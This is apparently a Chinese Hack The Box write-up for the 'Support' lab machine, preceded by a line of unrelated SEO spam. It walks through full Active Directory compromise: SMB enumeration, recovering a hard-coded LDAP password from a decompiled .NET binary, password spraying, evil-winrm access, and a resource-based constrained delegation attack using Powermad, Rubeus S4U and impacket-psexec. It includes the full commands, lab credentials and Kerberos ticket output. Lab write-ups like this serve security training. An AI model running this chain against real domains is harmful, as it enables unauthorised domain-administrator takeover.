锁定网站导航栏,西安网站制作顶,做家具有那个网站,快速建站框架目录
连接至HTB服务器并启动靶机
信息收集
使用rustscan对靶机TCP端口进行开放扫描
将靶机TCP开放端口号提取并保存
使用nmap对靶机TCP开放端口进行脚本、服务扫描
使用nmap对靶机TCP开放端口进行漏洞、系统扫描
使用nmap对靶机常用UDP端口进行开放扫描
使用ldapsearch…目录
连接至HTB服务器并启动靶机
信息收集
使用rustscan对靶机TCP端口进行开放扫描
将靶机TCP开放端口号提取并保存
使用nmap对靶机TCP开放端口进行脚本、服务扫描
使用nmap对靶机TCP开放端口进行漏洞、系统扫描
使用nmap对靶机常用UDP端口进行开放扫描
使用ldapsearch枚举靶机LDAP服务器根节点信息
使用smbmap通过匿名账户枚举靶机SMB服务共享
使用smbmap枚举support-tools共享内的文件
边界突破
使用Exeinfope查看UserInfo.exe文件编译
使用ILSpy反编译该EXE文件
使用netexec通过该密码与靶机LDAP账户匹配
在Windows环境下执行调试该EXE文件
尝试使用该EXE文件查询用户信息
使用kerbrute通过上述名单枚举靶机域内账户
使用ldapsearch对靶机LDAP服务器信息进行枚举
使用windapsearch对靶机域内用户进行枚举
使用netexec通过上述名单和密码对靶机SMB服务进行密码喷洒
使用evil-winrm通过上述凭证登录靶机Win-RM服务
权限提升
将SharpHound上传至靶机
执行该程序收集靶机域内信息
使用BloodHound对收集数据进行分析
从攻击机中上传并加载PowerView.ps1脚本
将Powermad上传至靶机
在域内新增一个计算机账户
将rubeus上传至靶机
使用rubeus通过S4U攻击模拟管理员身份伪造ST票据
使用impacket-ticketConverter转换该票据
使用impacket-psexec通过administrator票据登录靶机 连接至HTB服务器并启动靶机 分配IP10.10.16.21 靶机IP10.10.11.174 靶机Domainsupport.htb 信息收集
使用rustscan对靶机TCP端口进行开放扫描
rustscan -a 10.10.11.174 -r 1-65535 --ulimit 5000 | tee res 将靶机TCP开放端口号提取并保存
ports$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,) ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# grep ^[0-9] res | cut -d/ -f1 | paste -sd, 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49676,49678,49701,49739 ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# ports$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,) ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# echo $ports 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49676,49678,49701,49739 使用nmap对靶机TCP开放端口进行脚本、服务扫描
nmap -sT -p$ports -sCV -Pn 10.10.11.174 需要重点关注的端口和服务 53端口Domain服务 88端口Kerberos服务 389端口LDAP服务 445端口SMB服务 5985端口Win-RM服务 使用nmap对靶机TCP开放端口进行漏洞、系统扫描
nmap -sT -p$ports --scriptvuln -O -Pn 10.10.11.174 使用nmap对靶机常用UDP端口进行开放扫描
nmap -sU --top-ports 20 -Pn 10.10.11.174 使用ldapsearch枚举靶机LDAP服务器根节点信息
ldapsearch -H ldap://10.10.11.174 -x -s base namingcontexts 使用smbmap通过匿名账户枚举靶机SMB服务共享
smbmap -u guest -H 10.10.11.174 使用smbmap枚举support-tools共享内的文件
smbmap -u guest -H 10.10.11.174 -r support-tools 将UserInfo.exe.zip文件下载到攻击机本地
smbmap -u guest -H 10.10.11.174 -r support-tools -A UserInfo.exe.zip -download 使用unzip将该压缩包解压
unzip 10.10.11.174-support-tools_UserInfo.exe.zip -d UserInfo 边界突破
使用Exeinfope查看UserInfo.exe文件编译 由工具输出可知该EXE可执行文件为.NET框架环境编译执行且未加壳
使用ILSpy反编译该EXE文件 由此可得密钥和加密函数直接扔给大模型修改为Python代码以便编译执行 import base64class Protected:_enc_password 0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/YU193E_key barmandostaticmethoddef get_password():# 解码 Base64 字符串encrypted_data base64.b64decode(Protected._enc_password)decrypted_data bytearray(encrypted_data)# 解密过程for i in range(len(decrypted_data)):decrypted_data[i] ^ Protected._key[i % len(Protected._key)] ^ 0xDF# 返回解密后的字符串return decrypted_data.decode(utf-8)# 测试
if __name__ __main__:password Protected.get_password()print(Decrypted Password:, password)
直接编译运行获得密码 nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz 使用netexec通过该密码与靶机LDAP账户匹配
netexec smb 10.10.11.174 -u ldap -p nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz 在Windows环境下执行调试该EXE文件
.\UserInfo.exe find -first * 尝试使用该EXE文件查询用户信息
.\UserInfo.exe user -username langley.lucy 使用kerbrute通过上述名单枚举靶机域内账户
kerbrute userenum -d support.htb --dc 10.10.11.174 ./names.txt 很好全部都是域内用户但暂时没什么用因为可能不齐全
使用ldapsearch对靶机LDAP服务器信息进行枚举
ldapsearch -H ldap://10.10.11.174 -b dcsupport,dchtb -D ldapsupport.htb -w nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz | grep -C5 info: 拿到一串看起来像密码的字符串 Ironside47pleasure40Watchful 使用windapsearch对靶机域内用户进行枚举
windapsearch -d support.htb --dc 10.10.11.174 -u ldapsupport.htb -p nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz -U | grep cn: | cut -d -f2 使用netexec通过上述名单和密码对靶机SMB服务进行密码喷洒
netexec smb 10.10.11.174 -u ./names.txt -p Ironside47pleasure40Watchful --continue-on-success 账户support 密码Ironside47pleasure40Watchful 使用evil-winrm通过上述凭证登录靶机Win-RM服务
evil-winrm -i 10.10.11.174 -u support -p Ironside47pleasure40Watchful 在C:\Users\support\Desktop目录下找到user.txt文件 权限提升
将SharpHound上传至靶机
upload SharpHound.exe 执行该程序收集靶机域内信息
.\SharpHound.exe -c all
将生成的.zip文件下载到攻击机本地
download 20250124070955_BloodHound.zip 使用BloodHound对收集数据进行分析
首先查看域管理员 查看非约束委派最短系统路径 由图标展示可见当前账户对DC域控制器可进行PS控制
从攻击机中上传并加载PowerView.ps1脚本
. .\PowerView.ps1
查询域控制器名、靶机系统版本
Get-DomainController | Select Name,OSVersion | Format-List *Evil-WinRM* PS C:\ProgramData Get-DomainController | Select Name,OSVersion | Format-List Name : dc.support.htb OSVersion : Windows Server 2022 Standard 查询DC账户Kerberos约束委派信息
Get-DomainComputer DC | Select name,msds-allowedtoactonbehalfofotheridentity *Evil-WinRM* PS C:\ProgramData Get-DomainComputer DC | Select name,msds-allowedtoactonbehalfofotheridentity name msds-allowedtoactonbehalfofotheridentity ---- ---------------------------------------- DC 由输出可见当前DC账户未被其他计算机账户配置约束委派
将Powermad上传至靶机
upload Powermad.ps1 控制靶机加载该脚本
. .\Powermad.ps1
在域内新增一个计算机账户
New-MachineAccount -MachineAccount x0da6h -Password $(ConvertTo-SecureString 123456 -AsPlainText -Force) *Evil-WinRM* PS C:\ProgramData New-MachineAccount -MachineAccount x0da6h -Password $(ConvertTo-SecureString 123456 -AsPlainText -Force) [] Machine account x0da6h added 赋予该计算机账户代表DC的约束委派权限
Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount x0da6h$
查询DC可委派的主体
Get-ADComputer -Identity DC -Properties PrincipalsAllowedToDelegateToAccount
由输出可见DC已允许x0da6h$进行约束委派 将rubeus上传至靶机
upload Rubeus_x64.exe
使用rubeus为伪造的计算机账户x0da6h$生成域内密码哈希
.\Rubeus_x64.exe hash /password:123456 /user:x0da6h$ /domain:support.htb [*] Action: Calculate Password Hash(es)[*] Input password : 123456
[*] Input username : x0da6h$
[*] Input domain : support.htb
[*] Salt : SUPPORT.HTBhostx0da6h.support.htb
[*] rc4_hmac : 32ED87BDB5FDC5E9CBA88547376818D4
[*] aes128_cts_hmac_sha1 : 55843795AF436FD006A73ECEDE4C23C3
[*] aes256_cts_hmac_sha1 : 0FA84858304070B093E0712973F00F1BD075DBE3A59741DBE6B5811CBBFBBF7E
[*] des_cbc_md5 : DCAD7523D389D054
使用rubeus通过S4U攻击模拟管理员身份伪造ST票据
.\Rubeus_x64.exe s4u /user:x0da6h$ /password:123456 /domain:support.htb /impersonateuser:administrator /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /msdsspn:host/dc.support.htb /ptt /nowrap *Evil-WinRM* PS C:\ProgramData .\Rubeus_x64.exe s4u /user:x0da6h$ /password:123456 /domain:support.htb /impersonateuser:administrator /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /msdsspn:host/dc.support.htb /ptt /nowrap______ _(_____ \ | |_____) )_ _| |__ _____ _ _ ___| __ /| | | | _ \| ___ | | | |/___)| | \ \| |_| | |_) ) ____| |_| |___ ||_| |_|____/|____/|_____)____/(___/v2.3.2[*] Action: S4U[*] Using rc4_hmac hash: 32ED87BDB5FDC5E9CBA88547376818D4
[*] Building AS-REQ (w/ preauth) for: support.htb\x0da6h$
[*] Using domain controller: ::1:88
[] TGT request successful!
[*] base64(ticket.kirbi):doIFUjCCBU6gAwIBBaEDAgEWooIEazCCBGdhggRjMIIEX6ADAgEFoQ0bC1NVUFBPUlQuSFRCoiAwHqADAgECoRcwFRsGa3JidGd0GwtzdXBwb3J0Lmh0YqOCBCUwggQhoAMCARKhAwIBAqKCBBMEggQPhyxlix2lHe/rRq/6CAd4JUBFRyhxUpcnhSk7/8DnxVqLFTNf3odDJnxP9etEV5xhGdyegJCHRvkb1eZUpW6TZKKiwhSKlfx8OiLfxOAm9En2Ufffcohn/Hg6IPSktaawLTytjHSi1E1YrhbRO3k3/Y3MG1LZhh2kuAZvA1lQ5xjRnqhwDsix0RWbwzb9hDr3YnaKxnQzJHSFPuQyXzogurRnEQtwVkc4AQATty0V6JGRLpBZxvZ0hYwBHgHdYWEqFcIm5S3mNsIWwgEXpYDtXxqV0zyk1ax2RREKpiNCbJ494kpcWBKp/4nmGRH5crxJNn9bPaMUcKwAUqsA5Nus/oJrpubaWurRDLp8hHsqraEofQcbSDGbOKUre5sVN7IztOpgRPxCxx3Pz6Ih/3WMi1NFdbeWwbmKGg2w5ON3TCRDRaMO2pvhaKBEBG8Q7uUeRvxbuC0wven7MoLMG8T3r3I7UL8q6dgQITEXo5pOIjTKQ9/wnGMSiBFvMy6y2b6XZAKW6/NKGCvdqSl3SV51UYTWm6d3ngJUleeX6cEZiIJCkRHHq8BVE2K2sQNEd3ntynab6oFlWJIZMKoBSATqsZ1zrPomL0VnSxxLfTcKHhA4chPKTcbkXvJSwtmNNgcQdzHral4LXBxZOZmlLLQ8X81ogLy6Uxikhk1/OkMy0IAbu68uGmgTI/h9Qw52hPKYnbEQQyOEobd8JEKMdT0fwsxOEkQzcJ6ZLP96w5GY79ZM4K94tcEl2AL51fANX2yubL2tgwCYxfpxR6X7LpdQT4E9YBKe6KX6Dw2seFQk3LnfLz5pWpz1umQeBXRcW1YBGLYoqcLTp364G4FinFw/ceXlTiCFvEpxR3Pm8exIG/t8mQJ6hmwmd6bCYdw9FVD2LI35ISZr3fr7dRLazW0U7mcLbNHqrr8M/KdYp02ekcy5CPwt1P5c89YWc50eDnmgyeTtTSuwogkEEbayFbkkVRQS7d/XmTQzM23RU1gIwi8qI8iwmIEl8SzJHYcirzyXb7E6qXaCSVHzzMJyOxhscCpruf9NiHDB7yUxnrZCjmDiSHg4czkwgKQhE70m0WQasWpXCl/gAcYVDP6OsChXH015PVECoOpkY4jfImaJ0OEWb/X/Dx1HXYD4pyroIWsronaAnZHNDAC9AOVLo2SahYFPRfleAK/BzhPi53SxEvksJxhE6mUZA7wg5cB0mybI3uPZL7ryuumUAXLzW9kfpHSUw8fdHWdDDU2XDWlEh7nqLHQW6MulO7ZLEL5fy/Ve9yL91iH378zNbYtm6DR5P2ZPTBhGI3FcXYFu9mG5pVNhXig9PSEpjJx3tdEcOUF3LKXymFmmxMEk3wVOvrEaaOB0jCBz6ADAgEAooHHBIHEfYHBMIGoIG7MIG4MIG1oBswGaADAgEXoRIEEKBoFnGD/Hs55p6pHcsvtgqhDRsLU1VQUE9SVC5IVEKiFDASoAMCAQGhCzAJGwd4MGRhNmgkowcDBQBA4QAApREYDzIwMjUwMTI1MDkwOTM3WqYRGA8yMDI1MDEyNTE5MDkzN1qnERgPMjAyNTAyMDEwOTA5MzdaqA0bC1NVUFBPUlQuSFRCqSAwHqADAgECoRcwFRsGa3JidGd0GwtzdXBwb3J0Lmh0Yg[*] Action: S4U[*] Building S4U2self request for: x0da6h$SUPPORT.HTB
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2self request to ::1:88
[] S4U2self success!
[*] Got a TGS for administrator to x0da6h$SUPPORT.HTB
[*] base64(ticket.kirbi):doIFojCCBZ6gAwIBBaEDAgEWooIEwTCCBL1hggS5MIIEtaADAgEFoQ0bC1NVUFBPUlQuSFRCohQwEqADAgEBoQswCRsHeDBkYTZoJKOCBIcwggSDoAMCARehAwIBAaKCBHUEggRxr0AdAImZrMCI4ufGHn9IBevujqSPGBWzC/DQnHbOdVq8auEJJ9jEk8mcajMdKXn63FW8p/mNhwtCZQI8HjELanwwZXOKiF1aC6nooWxmGxf3ifzwVstcWx2lhHXPeBObyUMeg4axLQ4LOhXwLffx62QSvAwiZFXAg0tr2lvjf6EB6zHtMgeA435M899zKuHl7JuDpM8KTbH2sIhw1g2Ald4zEqH7cFKwWcN5k5/IpZsBXnAFLi/8vgEtItQgviiuDfTW9m7lm/WTJLi4zi2kEppXkTvSqZGxjPrMon/2l7LabR6CkfyTW6GjbB3sOt3Cyi2I2J43uSzP27ocwEX0dDRup4kA/WOJhJquzHEFPRf4/F0M0GfwCLcR9QALjwqX4My0OMnXy5hnBqJHPk7SDwovFLgF8C/K3IQxFHjD0osXNRVrBvHmCD9Rw3T4Iaaav0fUYmoBpf8/CZdEyRYbARut7KUGpJiKj6luKCvh4OowiLYKtsmAy7oTh04DytiSdSZz8ECOHimWzWrUjNWU6OCVr7MLwrAx2tq9PFErQ00U7LbKvxA70UxLQevNv40YlZalSMzX5UzFj5SdW1JOPAzeoFVwUZLKgDcN6JRnWhwg/4FVdFAjsZ0tV5JuvtNaC4cMCdGgcRmEqKPgm2hD/xo4fBNHHQm9euYmI/I4GjRT0o7g4DQovXiuHdyzaysGFM8jRlATvYOi1mRnRVMy/oG3sTgmG7bxJQ4JqdM/r68A3NWCbBKWPagY0QyluYjaKOOYo6EforqanY3LWR44nZAFBq41bqxdLXpBcUxYDkvozasnMefgfiLiBjJQuhgGKNiPdwY47PFdeYFk4qOf0Tuw2LkWLjz5sgo9BpuKrRuZQDETb2PixR8BPYwQ7lm7soHB5f7Z0VWLkGGq9uWNM7fxd3foeV/SkQLtZaRCbvSccyFHGR2gzwNmnk90WAOU8Yn2ihPryeVewUDRv8My3k1t67gaz9zLf4HSeA0oR2zPSxQCeJBc1UPN9sAx2Aq4B5Tg9TFnUBeDUDxq8YNr7EkdSiUIDDDAVMLnBCWILwmxnPyyjIgCteECslAW8nsElQcjUrcINrfjrjYBxgKYnhORf7o3b1O9CH6DLpY6xcikP1tJ45JGjuNBfc0eQ2NxYVX0wKnKMhOYORYJ1ZHrg4Rl39rHQSJkdY9I7xB3bZmdqXpBi0oRjLTGnAo3EDByE6rmCs1i/BwLyOm4F0DgTKKMnDDnAxvR3ULfputthKRHNwVkKwMfdgq6Se8/W6pAs6UYwsuTH87aTLneQvzjK5XJ9yRY5Gvk85g3qZwJEEdngY3e0XiltzoWDf/LZPqY12fwtCda8OJEVf3xAvdvCgIQCw5HdoPBUTkzp0tJ3gI604DNMHxWqyWInbGNMGEsGWrosesxj99Ssm7WBH1s/eFanZvXrTA49Nx9CtX4YwIZvu3MoFMku9qt9ddMhAI0ix5ZYv3W5grljhm6R0iKMGho4HMMIHJoAMCAQCigcEEgb59gbswgbiggbUwgbIwgagGzAZoAMCARehEgQQZpeNMgpkTWBVrobSVDrePKENGwtTVVBQT1JULkhUQqIaMBigAwIBCqERMA8bDWFkbWluaXN0cmF0b3KjBwMFAEChAAClERgPMjAyNTAxMjUwOTA5MzdaphEYDzIwMjUwMTI1MTkwOTM3WqcRGA8yMDI1MDIwMTA5MDkzN1qoDRsLU1VQUE9SVC5IVEKpFDASoAMCAQGhCzAJGwd4MGRhNmgk[*] Impersonating user administrator to target SPN host/dc.support.htb
[*] Building S4U2proxy request for service: host/dc.support.htb
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN host/dc.support.htb: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
[] Ticket successfully imported!
将票据进行BASE64解码后存入文件中
echo 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 | base64 -d administrator.kirbi 使用impacket-ticketConverter转换该票据
impacket-ticketConverter administrator.kirbi administrator.ccache 使用ntpdate对本地机器与靶机域控制器时间进行校准同步
ntpdate dc.support.htb
使用impacket-psexec通过administrator票据登录靶机
KRB5CCNAME./administrator.ccache impacket-psexec support.htb/administratordc.support.htb -k -no-pass 在C:\Users\Administrator\Desktop目录下找到root.txt文件
